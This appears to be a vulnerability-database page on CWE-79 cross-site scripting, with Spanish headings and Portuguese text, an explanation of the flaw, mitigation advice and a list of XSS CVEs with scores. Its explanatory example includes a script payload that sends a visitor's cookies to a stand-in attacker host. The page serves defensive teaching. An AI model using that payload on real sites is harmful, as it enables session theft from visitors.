Fallos del tipo CWE-79

28.608 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-0282MEDIUMCross-site Scripting in microweber/microweberEPSS 1.4%CVE-2025-0924HIGHWP Activity Log <= 5.2.2 - Unauthenticated Stored Cross-Site ScriptingEPSS 1.4%CVE-2021-3920MEDIUMCross-site Scripting (XSS) - Stored in getgrav/grav-plugin-adminEPSS 1.4%CVE-2018-15436—Cisco Webex Centers Cross-Site Scripting VulnerabilityEPSS 1.4%CVE-2023-29808MEDIUMCross Site Scripting (XSS) vulnerability in vogtmh cmaps (companymaps) 8.0 allows attackers to execute arbitrary code.EPSS 1.4%CVE-2021-24213—GiveWP < 2.10.0 - Reflected Cross Site Scripting (XSS)EPSS 1.4%CVE-2022-48012MEDIUMOpencats v0.9.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /opencats/index.php?m=settiEPSS 1.4%CVE-2025-1015MEDIUMUnsanitized address book fieldsEPSS 1.4%CVE-2024-10793HIGHWP Activity Log <= 5.2.1 - Unauthenticated Stored Cross-Site Scripting via User_id ParameterEPSS 1.4%CVE-2020-26280HIGHXSS in OpenSlidesEPSS 1.4%CVE-2025-24158MEDIUMThe issue was addressed with improved memory handling. This issue is fixed in Safari 18.3, iOS 18.3 and iPadOS 18.3, macOS Sequoia 15.3, tvOEPSS 1.4%CVE-2023-42034HIGHVisualware MyConnection Server doRTAAccessCTConfig Cross-Site Scripting Authentication Bypass VulnerabilityEPSS 1.4%CVE-2021-1245MEDIUMCisco Finesse OpenSocial Gadget Editor Cross-Site Scripting VulnerabilityEPSS 1.4%CVE-2019-25152HIGHAbandoned Cart Lite for WooCommerce < 5.2.0 and Abandoned Cart Pro for WooCommerce < 7.13.0 - Stored Cross-Site ScriptingEPSS 1.4%CVE-2022-0743MEDIUMCross-site Scripting (XSS) - Stored in getgrav/gravEPSS 1.4%CVE-2014-2370—Omron NS Series HMI Improper Neutralization of Input During Web Page GenerationEPSS 1.4%CVE-2008-3937MEDIUMMultiple cross-site scripting (XSS) vulnerabilities in Open Media Collectors Database (OpenDb) 1.0.6 allow remote attackers to inject arbitrEPSS 1.4%CVE-2022-24833HIGHPersistent Cross-site Scripting (XSS) vulnerability in PrivateBinEPSS 1.4%CVE-2017-16016—Sanitize-html is a library for scrubbing html input of malicious values. Versions 1.11.1 and below are vulnerable to cross site scripting (XEPSS 1.4%CVE-2022-2168—Download Manager < 3.2.44 - Reflected Cross-Site ScriptingEPSS 1.4%